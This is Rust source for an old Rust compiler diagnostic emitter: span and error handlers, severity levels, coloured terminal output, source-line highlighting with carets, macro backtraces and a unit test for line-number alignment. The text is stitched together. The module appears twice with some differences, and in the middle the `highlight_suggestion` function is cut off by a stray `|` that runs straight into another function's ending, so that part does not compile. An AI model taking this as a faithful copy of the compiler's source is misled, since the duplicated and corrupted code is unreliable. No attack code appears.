    let prefix = fm.get_line(first_line.line_index)
                   .map(|l| &l[..first_line.start_col.0])
                   .unwrap_or("");
    let last_line = lines.lines.last().unwrap();
    let suffix = fm.get_line(last_line.line_index)
                   .map(|l| &l[last_line.end_col.0..])
                   .unwrap_or("");
    let complete = format!("{}{}{}", prefix, suggestion, suffix);
    // print the suggestion without any line numbers, but leave
    // space for them. This helps with lining up with previous
    // snippets from the actual error being reported.
    let fm = &*lines.file;
    let mut lines = complete.lines();
    for (line, line_index) in lines.by_ref().take(MAX_LINES).zip(first_line.line_index..) {
        let elided_line_num = format!("{}", line_index+1);
        try!(write!(&mut err.dst, "{0}:{1:2$} {3}\n",
                    fm.name, "", elided_line_num.len(), line));
    }
    // if we elided some lines, add an ellipsis
    if lines.next().is_some() {
        let elided_line_num = format!("{}", first_line.line_index + MAX_LINES + 1);
        try!(write!(&mut err.dst, "{0:1$} {0:2$} ...\n",
                    "", fm.name.len(), elided_line_num.len()));
    }
    Ok(())
}
fn highlight_lines(err: &mut EmitterWriter,
cm: &codemap::CodeMap,
sp: Span,
lvl: Level,
lines: codemap::FileLinesResult)
-> io::Result<()>
{
let lines = match lines {
Ok(lines) => lines,
Err(_) => {
try!(write!(&mut err.dst, "(internal compiler error: unprintable span)\n"));
return Ok(());
}
};
let fm = &*lines.file;
let line_strings: Option<Vec<&str>> =
lines.lines.iter()
.map(|info| fm.get_line(info.line_index))
.collect();
let line_strings = match line_strings {
None => { return Ok(()); }
Some(line_strings) => line_strings
};
// Display only the first MAX_LINES lines.
let all_lines = lines.lines.len();
let display_lines = cmp::min(all_lines, MAX_LINES);
let display_line_infos = &lines.lines[..display_lines];
let display_line_strings = &line_strings[..display_lines];
// Calculate the widest number to format evenly and fix #11715
assert!(display_line_infos.len() > 0);
let mut max_line_num = display_line_infos[display_line_infos.len() - 1].line_index + 1;
let mut digits = 0;
while max_line_num > 0 {
max_line_num /= 10;
digits += 1;
}
// Print the offending lines
for (line_info, line) in display_line_infos.iter().zip(display_line_strings) {
try!(write!(&mut err.dst, "{}:{:>width$} {}\n",
fm.name,
line_info.line_index + 1,
line,
width=digits));
}
// If we elided something, put an ellipsis.
if display_lines < all_lines {
let last_line_index = display_line_infos.last().unwrap().line_index;
let s = format!("{}:{} ", fm.name, last_line_index + 1);
try!(write!(&mut err.dst, "{0:1$}...\n", "", s.len()));
}
// FIXME (#3260)
// If there's one line at fault we can easily point to the problem
if lines.lines.len() == 1 {
let lo = cm.lookup_char_pos(sp.lo);
let mut digits = 0;
let mut num = (lines.lines[0].line_index + 1) / 10;
// how many digits must be indent past?
while num > 0 { num /= 10; digits += 1; }
let mut s = String::new();
// Skip is the number of characters we need to skip because they are
// part of the 'filename:line ' part of the previous line.
let skip = fm.name.chars().count() + digits + 3;
for _ in 0..skip {
s.push(' ');
}
if let Some(orig) = fm.get_line(lines.lines[0].line_index) {
let mut col = skip;
let mut lastc = ' ';
let mut iter = orig.chars().enumerate();
for (pos, ch) in iter.by_ref() {
lastc = ch;
if pos >= lo.col.to_usize() { break; }
// Whenever a tab occurs on the previous line, we insert one on
// the error-point-squiggly-line as well (instead of a space).
// That way the squiggly line will usually appear in the correct
// position.
match ch {
'\t' => {
col += 8 - col%8;
s.push('\t');
},
_ => {
col += 1;
s.push(' ');
},
}
}
try!(write!(&mut err.dst, "{}", s));
let mut s = String::from("^");
let count = match lastc {
// Most terminals have a tab stop every eight columns by default
'\t' => 8 - col%8,
_ => 1,
};
col += count;
s.extend(::std::iter::repeat('~').take(count));
let hi = cm.lookup_char_pos(sp.hi);
if hi.col != lo.col {
for (pos, ch) in iter {
if pos >= hi.col.to_usize() { break; }
let count = match ch {
'\t' => 8 - col%8,
_ => 1,
};
col += count;
s.extend(::std::iter::repeat('~').take(count));
}
}
if s.len() > 1 {
// One extra squiggly is replaced by a "^"
s.pop();
}
try!(print_maybe_styled(err,
&format!("{}\n", s),
term::attr::ForegroundColor(lvl.color())));
}
}
Ok(())
}
/// Here are the differences between this and the normal `highlight_lines`:
/// `end_highlight_lines` will always put arrow on the last byte of the
/// span (instead of the first byte). Also, when the span is too long (more
/// than 6 lines), `end_highlight_lines` will print the first line, then
/// dot dot dot, then last line, whereas `highlight_lines` prints the first
/// six lines.
#[allow(deprecated)]
fn end_highlight_lines(w: &mut EmitterWriter,
cm: &codemap::CodeMap,
sp: Span,
lvl: Level,
lines: codemap::FileLinesResult)
-> io::Result<()> {
let lines = match lines {
Ok(lines) => lines,
Err(_) => {
try!(write!(&mut w.dst, "(internal compiler error: unprintable span)\n"));
return Ok(());
}
};
let fm = &*lines.file;
let lines = &lines.lines[..];
if lines.len() > MAX_LINES {
if let Some(line) = fm.get_line(lines[0].line_index) {
try!(write!(&mut w.dst, "{}:{} {}\n", fm.name,
lines[0].line_index + 1, line));
}
try!(write!(&mut w.dst, "...\n"));
let last_line_index = lines[lines.len() - 1].line_index;
if let Some(last_line) = fm.get_line(last_line_index) {
try!(write!(&mut w.dst, "{}:{} {}\n", fm.name,
last_line_index + 1, last_line));
}
} else {
for line_info in lines {
if let Some(line) = fm.get_line(line_info.line_index) {
try!(write!(&mut w.dst, "{}:{} {}\n", fm.name,
line_info.line_index + 1, line));
}
}
}
let last_line_start = format!("{}:{} ", fm.name, lines[lines.len()-1].line_index + 1);
let hi = cm.lookup_char_pos(sp.hi);
let skip = last_line_start.chars().count();
let mut s = String::new();
for _ in 0..skip {
s.push(' ');
}
if let Some(orig) = fm.get_line(lines[0].line_index) {
let iter = orig.chars().enumerate();
for (pos, ch) in iter {
// Span seems to use half-opened interval, so subtract 1
if pos >= hi.col.to_usize() - 1 { break; }
// Whenever a tab occurs on the previous line, we insert one on
// the error-point-squiggly-line as well (instead of a space).
// That way the squiggly line will usually appear in the correct
// position.
match ch {
'\t' => s.push('\t'),
_ => s.push(' '),
}
}
}
s.push('^');
s.push('\n');
print_maybe_styled(w,
&s[..],
term::attr::ForegroundColor(lvl.color()))
}
fn print_macro_backtrace(w: &mut EmitterWriter,
cm: &codemap::CodeMap,
sp: Span)
-> io::Result<()> {
let cs = try!(cm.with_expn_info(sp.expn_id, |expn_info| -> io::Result<_> {
match expn_info {
Some(ei) => {
let ss = ei.callee.span.map_or(String::new(),
|span| cm.span_to_string(span));
let (pre, post) = match ei.callee.format {
codemap::MacroAttribute => ("#[", "]"),
codemap::MacroBang => ("", "!"),
codemap::CompilerExpansion => ("", ""),
};
try!(print_diagnostic(w, &ss, Note,
&format!("in expansion of {}{}{}",
pre,
ei.callee.name,
post),
None));
let ss = cm.span_to_string(ei.call_site);
try!(print_diagnostic(w, &ss, Note, "expansion site", None));
Ok(Some(ei.call_site))
}
None => Ok(None)
}
}));
cs.map_or(Ok(()), |call_site| print_macro_backtrace(w, cm, call_site))
}
/// Unwraps `opt`, reporting an internal compiler error through `diag` when it
/// is `None`. The message closure is only evaluated on the failure path.
pub fn expect<T, M>(diag: &SpanHandler, opt: Option<T>, msg: M) -> T where
    M: FnOnce() -> String,
{
    // `bug` diverges (`-> !`), so the closure coerces to `T`.
    opt.unwrap_or_else(|| diag.handler().bug(&msg()))
}
#[cfg(test)]
mod test {
use super::{EmitterWriter, highlight_lines, Level};
use codemap::{mk_sp, CodeMap, BytePos};
use std::sync::{Arc, Mutex};
use std::io::{self, Write};
use std::str::from_utf8;
// Diagnostic doesn't align properly in span where line number increases by one digit
#[test]
fn test_hilight_suggestion_issue_11715() {
struct Sink(Arc<Mutex<Vec<u8>>>);
impl Write for Sink {
fn write(&mut self, data: &[u8]) -> io::Result<usize> {
Write::write(&mut *self.0.lock().unwrap(), data)
}
fn flush(&mut self) -> io::Result<()> { Ok(()) }
}
let data = Arc::new(Mutex::new(Vec::new()));
let mut ew = EmitterWriter::new(Box::new(Sink(data.clone())), None);
let cm = CodeMap::new();
let content = "abcdefg
koksi
line3
line4
cinq
line6
line7
line8
line9
line10
e-lä-vän
tolv
dreizehn
";
let file = cm.new_filemap("dummy.txt".to_string(), content.to_string());
for (i, b) in content.bytes().enumerate() {
if b == b'\n' {
file.next_line(BytePos(i as u32));
}
}
let start = file.lines.borrow()[7];
let end = file.lines.borrow()[11];
let sp = mk_sp(start, end);
let lvl = Level::Error;
println!("span_to_lines");
let lines = cm.span_to_lines(sp);
println!("highlight_lines");
highlight_lines(&mut ew, &cm, sp, lvl, lines).unwrap();
println!("done");
let vec = data.lock().unwrap().clone();
let vec: &[u8] = &vec;
println!("{}", from_utf8(vec).unwrap());
assert_eq!(vec, "dummy.txt: 8 \n\
dummy.txt: 9 \n\
dummy.txt:10 \n\
dummy.txt:11 \n\
dummy.txt:12 \n".as_bytes());
}
}
// Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
pub use self::Level::*;
pub use self::RenderSpan::*;
pub use self::ColorConfig::*;
use self::Destination::*;
use codemap::{self, COMMAND_LINE_SP, COMMAND_LINE_EXPN, Pos, Span};
use diagnostics;
use std::cell::{RefCell, Cell};
use std::{cmp, error, fmt};
use std::io::prelude::*;
use std::io;
use term::{self, WriterWrapper};
use libc;
/// maximum number of lines we will print for each error; arbitrary.
const MAX_LINES: usize = 6;
#[derive(Clone)]
pub enum RenderSpan {
/// A FullSpan renders with both with an initial line for the
/// message, prefixed by file:linenum, followed by a summary of
/// the source code covered by the span.
FullSpan(Span),
/// Similar to a FullSpan, but the cited position is the end of
/// the span, instead of the start. Used, at least, for telling
/// compiletest/runtest to look at the last line of the span
/// (since `end_highlight_lines` displays an arrow to the end
/// of the span).
EndSpan(Span),
/// A suggestion renders with both with an initial line for the
/// message, prefixed by file:linenum, followed by a summary
/// of hypothetical source code, where the `String` is spliced
/// into the lines in place of the code covered by the span.
Suggestion(Span, String),
/// A FileLine renders with just a line for the message prefixed
/// by file:linenum.
FileLine(Span),
}
impl RenderSpan {
fn span(&self) -> Span {
match *self {
FullSpan(s) |
Suggestion(s, _) |
EndSpan(s) |
FileLine(s) =>
s
}
}
}
#[derive(Clone, Copy)]
pub enum ColorConfig {
Auto,
Always,
Never
}
pub trait Emitter {
fn emit(&mut self, cmsp: Option<(&codemap::CodeMap, Span)>,
msg: &str, code: Option<&str>, lvl: Level);
fn custom_emit(&mut self, cm: &codemap::CodeMap,
sp: RenderSpan, msg: &str, lvl: Level);
}
/// Used as a return value to signify a fatal error occurred. (It is also
/// used as the argument to panic at the moment, but that will eventually
/// not be true.)
#[derive(Copy, Clone, Debug)]
#[must_use]
pub struct FatalError;
impl fmt::Display for FatalError {
fn fmt(&self, f: &mut fmt::Formatter) -> Result<(), fmt::Error> {
write!(f, "parser fatal error")
}
}
impl error::Error for FatalError {
fn description(&self) -> &str {
"The parser has encountered a fatal error"
}
}
/// Signifies that the compiler died with an explicit call to `.bug`
/// or `.span_bug` rather than a failed assertion, etc.
#[derive(Copy, Clone, Debug)]
pub struct ExplicitBug;
impl fmt::Display for ExplicitBug {
fn fmt(&self, f: &mut fmt::Formatter) -> Result<(), fmt::Error> {
write!(f, "parser internal bug")
}
}
impl error::Error for ExplicitBug {
fn description(&self) -> &str {
"The parser has encountered an internal bug"
}
}
/// A span-handler is like a handler but also
/// accepts span information for source-location
/// reporting.
pub struct SpanHandler {
pub handler: Handler,
pub cm: codemap::CodeMap,
}
impl SpanHandler {
pub fn new(handler: Handler, cm: codemap::CodeMap) -> SpanHandler {
SpanHandler {
handler: handler,
cm: cm,
}
}
pub fn span_fatal(&self, sp: Span, msg: &str) -> FatalError {
self.handler.emit(Some((&self.cm, sp)), msg, Fatal);
return FatalError;
}
pub fn span_fatal_with_code(&self, sp: Span, msg: &str, code: &str) -> FatalError {
self.handler.emit_with_code(Some((&self.cm, sp)), msg, code, Fatal);
return FatalError;
}
pub fn span_err(&self, sp: Span, msg: &str) {
self.handler.emit(Some((&self.cm, sp)), msg, Error);
self.handler.bump_err_count();
}
pub fn span_err_with_code(&self, sp: Span, msg: &str, code: &str) {
self.handler.emit_with_code(Some((&self.cm, sp)), msg, code, Error);
self.handler.bump_err_count();
}
pub fn span_warn(&self, sp: Span, msg: &str) {
self.handler.emit(Some((&self.cm, sp)), msg, Warning);
}
pub fn span_warn_with_code(&self, sp: Span, msg: &str, code: &str) {
self.handler.emit_with_code(Some((&self.cm, sp)), msg, code, Warning);
}
pub fn span_note(&self, sp: Span, msg: &str) {
self.handler.emit(Some((&self.cm, sp)), msg, Note);
}
pub fn span_end_note(&self, sp: Span, msg: &str) {
self.handler.custom_emit(&self.cm, EndSpan(sp), msg, Note);
}
pub fn span_help(&self, sp: Span, msg: &str) {
self.handler.emit(Some((&self.cm, sp)), msg, Help);
}
/// Prints out a message with a suggested edit of the code.
///
/// See `diagnostic::RenderSpan::Suggestion` for more information.
pub fn span_suggestion(&self, sp: Span, msg: &str, suggestion: String) {
self.handler.custom_emit(&self.cm, Suggestion(sp, suggestion), msg, Help);
}
pub fn fileline_note(&self, sp: Span, msg: &str) {
self.handler.custom_emit(&self.cm, FileLine(sp), msg, Note);
}
pub fn fileline_help(&self, sp: Span, msg: &str) {
self.handler.custom_emit(&self.cm, FileLine(sp), msg, Help);
}
pub fn span_bug(&self, sp: Span, msg: &str) -> ! {
self.handler.emit(Some((&self.cm, sp)), msg, Bug);
panic!(ExplicitBug);
}
pub fn span_unimpl(&self, sp: Span, msg: &str) -> ! {
self.span_bug(sp, &format!("unimplemented {}", msg));
}
pub fn handler<'a>(&'a self) -> &'a Handler {
&self.handler
}
}
/// A handler deals with errors; certain errors
/// (fatal, bug, unimpl) may cause immediate exit,
/// others log errors for later reporting.
pub struct Handler {
err_count: Cell<usize>,
emit: RefCell<Box<Emitter + Send>>,
pub can_emit_warnings: bool
}
impl Handler {
pub fn new(color_config: ColorConfig,
registry: Option<diagnostics::registry::Registry>,
can_emit_warnings: bool) -> Handler {
let emitter = Box::new(EmitterWriter::stderr(color_config, registry));
Handler::with_emitter(can_emit_warnings, emitter)
}
pub fn with_emitter(can_emit_warnings: bool, e: Box<Emitter + Send>) -> Handler {
Handler {
err_count: Cell::new(0),
emit: RefCell::new(e),
can_emit_warnings: can_emit_warnings
}
}
pub fn fatal(&self, msg: &str) -> ! {
self.emit.borrow_mut().emit(None, msg, None, Fatal);
panic!(FatalError);
}
pub fn err(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Error);
self.bump_err_count();
}
pub fn bump_err_count(&self) {
self.err_count.set(self.err_count.get() + 1);
}
pub fn err_count(&self) -> usize {
self.err_count.get()
}
pub fn has_errors(&self) -> bool {
self.err_count.get() > 0
}
pub fn abort_if_errors(&self) {
let s;
match self.err_count.get() {
0 => return,
1 => s = "aborting due to previous error".to_string(),
_ => {
s = format!("aborting due to {} previous errors",
self.err_count.get());
}
}
self.fatal(&s[..]);
}
pub fn warn(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Warning);
}
pub fn note(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Note);
}
pub fn help(&self, msg: &str) {
self.emit.borrow_mut().emit(None, msg, None, Help);
}
pub fn bug(&self, msg: &str) -> ! {
self.emit.borrow_mut().emit(None, msg, None, Bug);
panic!(ExplicitBug);
}
pub fn unimpl(&self, msg: &str) -> ! {
self.bug(&format!("unimplemented {}", msg));
}
pub fn emit(&self,
cmsp: Option<(&codemap::CodeMap, Span)>,
msg: &str,
lvl: Level) {
if lvl == Warning && !self.can_emit_warnings { return }
self.emit.borrow_mut().emit(cmsp, msg, None, lvl);
}
pub fn emit_with_code(&self,
cmsp: Option<(&codemap::CodeMap, Span)>,
msg: &str,
code: &str,
lvl: Level) {
if lvl == Warning && !self.can_emit_warnings { return }
self.emit.borrow_mut().emit(cmsp, msg, Some(code), lvl);
}
pub fn custom_emit(&self, cm: &codemap::CodeMap,
sp: RenderSpan, msg: &str, lvl: Level) {
if lvl == Warning && !self.can_emit_warnings { return }
self.emit.borrow_mut().custom_emit(cm, sp, msg, lvl);
}
}
#[derive(Copy, PartialEq, Clone, Debug)]
pub enum Level {
Bug,
Fatal,
Error,
Warning,
Note,
Help,
}
impl fmt::Display for Level {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
use std::fmt::Display;
match *self {
Bug => "error: internal compiler error".fmt(f),
Fatal | Error => "error".fmt(f),
Warning => "warning".fmt(f),
Note => "note".fmt(f),
Help => "help".fmt(f),
}
}
}
impl Level {
fn color(self) -> term::color::Color {
match self {
Bug | Fatal | Error => term::color::BRIGHT_RED,
Warning => term::color::BRIGHT_YELLOW,
Note => term::color::BRIGHT_GREEN,
Help => term::color::BRIGHT_CYAN,
}
}
}
fn print_maybe_styled(w: &mut EmitterWriter,
msg: &str,
color: term::attr::Attr) -> io::Result<()> {
match w.dst {
Terminal(ref mut t) => {
try!(t.attr(color));
// If `msg` ends in a newline, we need to reset the color before
// the newline. We're making the assumption that we end up writing
// to a `LineBufferedWriter`, which means that emitting the reset
// after the newline ends up buffering the reset until we print
// another line or exit. Buffering the reset is a problem if we're
// sharing the terminal with any other programs (e.g. other rustc
// instances via `make -jN`).
//
// Note that if `msg` contains any internal newlines, this will
// result in the `LineBufferedWriter` flushing twice instead of
// once, which still leaves the opportunity for interleaved output
// to be miscolored. We assume this is rare enough that we don't
// have to worry about it.
if msg.ends_with("\n") {
try!(t.write_all(msg[..msg.len()-1].as_bytes()));
try!(t.reset());
try!(t.write_all(b"\n"));
} else {
try!(t.write_all(msg.as_bytes()));
try!(t.reset());
}
Ok(())
}
Raw(ref mut w) => w.write_all(msg.as_bytes()),
}
}
fn print_diagnostic(dst: &mut EmitterWriter, topic: &str, lvl: Level,
msg: &str, code: Option<&str>) -> io::Result<()> {
if !topic.is_empty() {
try!(write!(&mut dst.dst, "{} ", topic));
}
try!(print_maybe_styled(dst,
&format!("{}: ", lvl.to_string()),
term::attr::ForegroundColor(lvl.color())));
try!(print_maybe_styled(dst,
&format!("{}", msg),
term::attr::Bold));
match code {
Some(code) => {
let style = term::attr::ForegroundColor(term::color::BRIGHT_MAGENTA);
try!(print_maybe_styled(dst, &format!(" [{}]", code.clone()), style));
}
None => ()
}
try!(write!(&mut dst.dst, "\n"));
Ok(())
}
pub struct EmitterWriter {
dst: Destination,
registry: Option<diagnostics::registry::Registry>
}
enum Destination {
Terminal(Box<term::Terminal<WriterWrapper> + Send>),
Raw(Box<Write + Send>),
}
impl EmitterWriter {
pub fn stderr(color_config: ColorConfig,
registry: Option<diagnostics::registry::Registry>) -> EmitterWriter {
let stderr = io::stderr();
let use_color = match color_config {
Always => true,
Never => false,
Auto => stderr_isatty(),
};
if use_color {
let dst = match term::stderr() {
Some(t) => Terminal(t),
None => Raw(Box::new(stderr)),
};
EmitterWriter { dst: dst, registry: registry }
} else {
EmitterWriter { dst: Raw(Box::new(stderr)), registry: registry }
}
}
pub fn new(dst: Box<Write + Send>,
registry: Option<diagnostics::registry::Registry>) -> EmitterWriter {
EmitterWriter { dst: Raw(dst), registry: registry }
}
}
#[cfg(unix)]
fn stderr_isatty() -> bool {
unsafe { libc::isatty(libc::STDERR_FILENO) != 0 }
}
#[cfg(windows)]
fn stderr_isatty() -> bool {
const STD_ERROR_HANDLE: libc::DWORD = -12i32 as libc::DWORD;
extern "system" {
fn GetStdHandle(which: libc::DWORD) -> libc::HANDLE;
fn GetConsoleMode(hConsoleHandle: libc::HANDLE,
lpMode: libc::LPDWORD) -> libc::BOOL;
}
unsafe {
let handle = GetStdHandle(STD_ERROR_HANDLE);
let mut out = 0;
GetConsoleMode(handle, &mut out) != 0
}
}
impl Write for Destination {
fn write(&mut self, bytes: &[u8]) -> io::Result<usize> {
match *self {
Terminal(ref mut t) => t.write(bytes),
Raw(ref mut w) => w.write(bytes),
}
}
fn flush(&mut self) -> io::Result<()> {
match *self {
Terminal(ref mut t) => t.flush(),
Raw(ref mut w) => w.flush(),
}
}
}
impl Emitter for EmitterWriter {
fn emit(&mut self,
cmsp: Option<(&codemap::CodeMap, Span)>,
msg: &str, code: Option<&str>, lvl: Level) {
let error = match cmsp {
Some((cm, COMMAND_LINE_SP)) => emit(self, cm,
FileLine(COMMAND_LINE_SP),
msg, code, lvl),
Some((cm, sp)) => emit(self, cm, FullSpan(sp), msg, code, lvl),
None => print_diagnostic(self, "", lvl, msg, code),
};
match error {
Ok(()) => {}
Err(e) => panic!("failed to print diagnostics: {:?}", e),
}
}
fn custom_emit(&mut self, cm: &codemap::CodeMap,
sp: RenderSpan, msg: &str, lvl: Level) {
match emit(self, cm, sp, msg, None, lvl) {
Ok(()) => {}
Err(e) => panic!("failed to print diagnostics: {:?}", e),
}
}
}
fn emit(dst: &mut EmitterWriter, cm: &codemap::CodeMap, rsp: RenderSpan,
msg: &str, code: Option<&str>, lvl: Level) -> io::Result<()> {
let sp = rsp.span();
// We cannot check equality directly with COMMAND_LINE_SP
// since PartialEq is manually implemented to ignore the ExpnId
let ss = if sp.expn_id == COMMAND_LINE_EXPN {
"<command line option>".to_string()
} else if let EndSpan(_) = rsp {
let span_end = Span { lo: sp.hi, hi: sp.hi, expn_id: sp.expn_id};
cm.span_to_string(span_end)
} else {
cm.span_to_string(sp)
};
try!(print_diagnostic(dst, &ss[..], lvl, msg, code));
match rsp {
FullSpan(_) => {
try!(highlight_lines(dst, cm, sp, lvl, cm.span_to_lines(sp)));
try!(print_macro_backtrace(dst, cm, sp));
}
EndSpan(_) => {
try!(end_highlight_lines(dst, cm, sp, lvl, cm.span_to_lines(sp)));
try!(print_macro_backtrace(dst, cm, sp));
}
Suggestion(_, ref suggestion) => {
try!(highlight_suggestion(dst, cm, sp, suggestion));
try!(print_macro_backtrace(dst, cm, sp));
}
FileLine(..) => {
// no source text in this case!
}
}
match code {
Some(code) =>
match dst.registry.as_ref().and_then(|registry| registry.find_description(code)) {
Some(_) => {
try!(print_diagnostic(dst, &ss[..], Help,
&format!("run `rustc --explain {}` to see a detailed \
explanation", code), None));
}
None => ()
},
None => (),
}
Ok(())
}
fn highlight_suggestion(err: &mut EmitterWriter,
cm: &codemap::CodeMap,
sp: Span,
suggestion: &str)
-> io::Result<()>
{
let lines = cm.span_to_lines(sp).unwrap();
assert!(!lines.lines.is_empty());
// To build up the result, we want to take the snippet from the first
// line that precedes the span, prepend that with the suggestion, and
// then append the snippet from the last line that trails the span.
let fm = &lines.file;
let first_line = &lines.lines[0];
let prefix = fm.get_line(first_line.line_index)
.map(|l| &l[..first_line.start_col.0])
.unwrap_or("");
let last_line = lines.lines.last().unwrap();
let suffix = fm.get_line(last_line.line_index)
.map(|l| &l[last_line.end_col.0..])
.unwrap_or("");
let complete = format!("{}{}{}", prefix, suggestion, suffix);
// print the suggestion without any line numbers, but leave
// space for them. This helps with lining up with previous
// snippets from the actual error being reported.
let fm = &*lines.file;
let mut lines = complete.lines();
for (line, line_index) in lines.by_ref().take(MAX_LINES).zip(first_line.line_index..) {
let elided_line_num = format!("{}", line_index+1);
try!(write!(&mut err.dst, "{0}:{1:2$} {3}\n",
fm.name, "", elided_line_num.len(), line));
}
// if we elided some lines, add an ellipsis
if lines.next().is_some() |
Ok(())
}
fn highlight_lines(err: &mut EmitterWriter,
cm: &codemap::CodeMap,
sp: Span,
lvl: Level,
lines: codemap::FileLinesResult)
-> io::Result<()>
{
let lines = match lines {
Ok(lines) => lines,
Err(_) => {
try!(write!(&mut err.dst, "(internal compiler error: unprintable span)\n"));
return Ok(());
}
};
let fm = &*lines.file;
let line_strings: Option<Vec<&str>> =
lines.lines.iter()
.map(|info| fm.get_line(info.line_index))
.collect();
let line_strings = match line_strings {
None => { return Ok(()); }
Some(line_strings) => line_strings
};
// Display only the first MAX_LINES lines.
let all_lines = lines.lines.len();
let display_lines = cmp::min(all_lines, MAX_LINES);
let display_line_infos = &lines.lines[..display_lines];
let display_line_strings = &line_strings[..display_lines];
// Calculate the widest number to format evenly and fix #11715
assert!(display_line_infos.len() > 0);
let mut max_line_num = display_line_infos[display_line_infos.len() - 1].line_index + 1;
let mut digits = 0;
while max_line_num > 0 {
max_line_num /= 10;
digits += 1;
}
// Print the offending lines
for (line_info, line) in display_line_infos.iter().zip(display_line_strings) {
try!(write!(&mut err.dst, "{}:{:>width$} {}\n",
fm.name,
line_info.line_index + 1,
line,
width=digits));
}
// If we elided something, put an ellipsis.
if display_lines < all_lines {
let last_line_index = display_line_infos.last().unwrap().line_index;
let s = format!("{}:{} ", fm.name, last_line_index + 1);
try!(write!(&mut err.dst, "{0:1$}...\n", "", s.len()));
}
// FIXME (#3260)
// If there's one line at fault we can easily point to the problem
if lines.lines.len() == 1 {
let lo = cm.lookup_char_pos(sp.lo);
let mut digits = 0;
let mut num = (lines.lines[0].line_index + 1) / 10;
// how many digits must be indent past?
while num > 0 { num /= 10; digits += 1; }
let mut s = String::new();
// Skip is the number of characters we need to skip because they are
// part of the 'filename:line ' part of the previous line.
let skip = fm.name.chars().count() + digits + 3;
for _ in 0..skip {
s.push(' ');
}
if let Some(orig) = fm.get_line(lines.lines[0].line_index) {
let mut col = skip;
let mut lastc = ' ';
let mut iter = orig.chars().enumerate();
for (pos, ch) in iter.by_ref() {
lastc = ch;
if pos >= lo.col.to_usize() { break; }
// Whenever a tab occurs on the previous line, we insert one on
// the error-point-squiggly-line as well (instead of a space).
// That way the squiggly line will usually appear in the correct
// position.
match ch {
'\t' => {
col += 8 - col%8;
s.push('\t');
},
_ => {
col += 1;
s.push(' ');
},
}
}
try!(write!(&mut err.dst, "{}", s));
let mut s = String::from("^");
let count = match lastc {
// Most terminals have a tab stop every eight columns by default
'\t' => 8 - col%8,
_ => 1,
};
col += count;
s.extend(::std::iter::repeat('~').take(count));
let hi = cm.lookup_char_pos(sp.hi);
if hi.col != lo.col {
for (pos, ch) in iter {
if pos >= hi.col.to_usize() { break; }
let count = match ch {
'\t' => 8 - col%8,
_ => 1,
};
col += count;
s.extend(::std::iter::repeat('~').take(count));
}
}
if s.len() > 1 {
// One extra squiggly is replaced by a "^"
s.pop();
}
try!(print_maybe_styled(err,
&format!("{}\n", s),
term::attr::ForegroundColor(lvl.color())));
}
}
Ok(())
}
/// Here are the differences between this and the normal `highlight_lines`:
/// `end_highlight_lines` will always put arrow on the last byte of the
/// span (instead of the first byte). Also, when the span is too long (more
/// than 6 lines), `end_highlight_lines` will print the first line, then
/// dot dot dot, then last line, whereas `highlight_lines` prints the first
/// six lines.
#[allow(deprecated)]
fn end_highlight_lines(w: &mut EmitterWriter,
cm: &codemap::CodeMap,
sp: Span,
lvl: Level,
lines: codemap::FileLinesResult)
-> io::Result<()> {
let lines = match lines {
Ok(lines) => lines,
Err(_) => {
try!(write!(&mut w.dst, "(internal compiler error: unprintable span)\n"));
return Ok(());
}
};
let fm = &*lines.file;
let lines = &lines.lines[..];
if lines.len() > MAX_LINES {
if let Some(line) = fm.get_line(lines[0].line_index) {
try!(write!(&mut w.dst, "{}:{} {}\n", fm.name,
lines[0].line_index + 1, line));
}
try!(write!(&mut w.dst, "...\n"));
let last_line_index = lines[lines.len() - 1].line_index;
if let Some(last_line) = fm.get_line(last_line_index) {
try!(write!(&mut w.dst, "{}:{} {}\n", fm.name,
last_line_index + 1, last_line));
}
} else {
for line_info in lines {
if let Some(line) = fm.get_line(line_info.line_index) {
try!(write!(&mut w.dst, "{}:{} {}\n", fm.name,
line_info.line_index + 1, line));
}
}
}
let last_line_start = format!("{}:{} ", fm.name, lines[lines.len()-1].line_index + 1);
let hi = cm.lookup_char_pos(sp.hi);
let skip = last_line_start.chars().count();
let mut s = String::new();
for _ in 0..skip {
s.push(' ');
}
if let Some(orig) = fm.get_line(lines[0].line_index) {
let iter = orig.chars().enumerate();
for (pos, ch) in iter {
// Span seems to use half-opened interval, so subtract 1
if pos >= hi.col.to_usize() - 1 { break; }
// Whenever a tab occurs on the previous line, we insert one on
// the error-point-squiggly-line as well (instead of a space).
// That way the squiggly line will usually appear in the correct
// position.
match ch {
'\t' => s.push('\t'),
_ => s.push(' '),
}
}
}
s.push('^');
s.push('\n');
print_maybe_styled(w,
&s[..],
term::attr::ForegroundColor(lvl.color()))
}
fn print_macro_backtrace(w: &mut EmitterWriter,
cm: &codemap::CodeMap,
sp: Span)
-> io::Result<()> {
let cs = try!(cm.with_expn_info(sp.expn_id, |expn_info| -> io::Result<_> {
match expn_info {
Some(ei) => {
let ss = ei.callee.span.map_or(String::new(),
|span| cm.span_to_string(span));
let (pre, post) = match ei.callee.format {
codemap::MacroAttribute => ("#[", "]"),
codemap::MacroBang => ("", "!"),
codemap::CompilerExpansion => ("", ""),
};
try!(print_diagnostic(w, &ss, Note,
&format!("in expansion of {}{}{}",
pre,
ei.callee.name,
post),
None));
let ss = cm.span_to_string(ei.call_site);
try!(print_diagnostic(w, &ss, Note, "expansion site", None));
Ok(Some(ei.call_site))
}
None => Ok(None)
}
}));
cs.map_or(Ok(()), |call_site| print_macro_backtrace(w, cm, call_site))
}
pub fn expect<T, M>(diag: &SpanHandler, opt: Option<T>, msg: M) -> T where
M: FnOnce() -> String,
{
match opt {
Some(t) => t,
None => diag.handler().bug(&msg()),
}
}
#[cfg(test)]
mod test {
use super::{EmitterWriter, highlight_lines, Level};
use codemap::{mk_sp, CodeMap, BytePos};
use std::sync::{Arc, Mutex};
use std::io::{self, Write};
use std::str::from_utf8;
// Diagnostic doesn't align properly in span where line number increases by one digit
#[test]
fn test_hilight_suggestion_issue_11715() {
struct Sink(Arc<Mutex<Vec<u8>>>);
impl Write for Sink {
fn write(&mut self, data: &[u8]) -> io::Result<usize> {
